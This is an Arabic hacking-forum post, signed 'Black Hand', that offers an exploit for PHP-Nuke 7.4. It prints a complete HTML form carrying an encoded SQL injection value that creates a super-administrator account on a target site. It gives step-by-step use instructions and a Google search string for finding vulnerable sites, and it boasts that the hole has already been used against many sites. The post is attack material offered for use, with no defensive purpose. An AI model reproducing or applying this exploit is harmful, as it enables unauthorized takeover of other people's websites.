الهكر مضره اذا كشفت سره (( هكر×هكر)) ادخل وتعلم كيف تكون المسيطره
بسم الله الرحمن الرحيم
ياشباب معليش اذاماقدرت ارد على اقتحاتكم او انفذ طلباتكم لأن عندي ضغط كثير (3 منتديات)
وانشالله اقدر انفذ اوامركم واي سؤال او استفسار انا حاضرواي طريقه انا جبتها او اكتشفتها
اضمنوها 100%100 لأني اجربها قبل
اقدم لكم ثغره XSSPHP-Nuke 7.4 Add Admin الخطيره
وتم اختراق هذه الثغره بالعديد من المواقع
الشرح :-
ما عليك اخذ هاد الكود:-
كود:
<form name="mantra" method="POST" action="http://www.site name/admin.php"><p>USERNAME: <input type="text" name="add_aid" size="20">NOME: <input type="text" name="add_name" size="20">PASSWORD: <input type="text" name="add_pwd" size="20">E-MAIL: <input type="text" name="add_email" size="20"><input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><input type="hidden" name="add_radminsuper" value="1"><input type="hidden" name="op" value="AddAuthor"></p><p><input type="submit" name="Submit" value="Create Admin"></p></form>/
بدل كلمه (name) تحط اسم الموقع المراد اختراقه يكون بهذا الشكل www.nnn4
بعد ما تحط الكود فى Notepad تحول امتداد Notepad الى htm
اول ما تفتح الصفحه هتلاقى هذه المربعات
USERNAME: تكتب النك الي فيه ادمن
NOME:تكتب نكك مره ثانيه
E-MAIL:اكتب اي ايميل تبي
بعدين تضغط على Create Admin
وبعدها هتلاقى ادمن الموقع
ثانيا :-
كيفيه البحث عن المواقع المصابه بهذا الثغره
تفتح موقع جوجل www.google.com
وتكتب by PHP-Nuke. All Rights Reserved
وهكذا انتهاء الشرح يارب يكون عجبكم شرحى
مع تحيات اليد السوداء BLAK hAnD +_=
VvvV_DRAKOLA_VvvV@hotmail.com
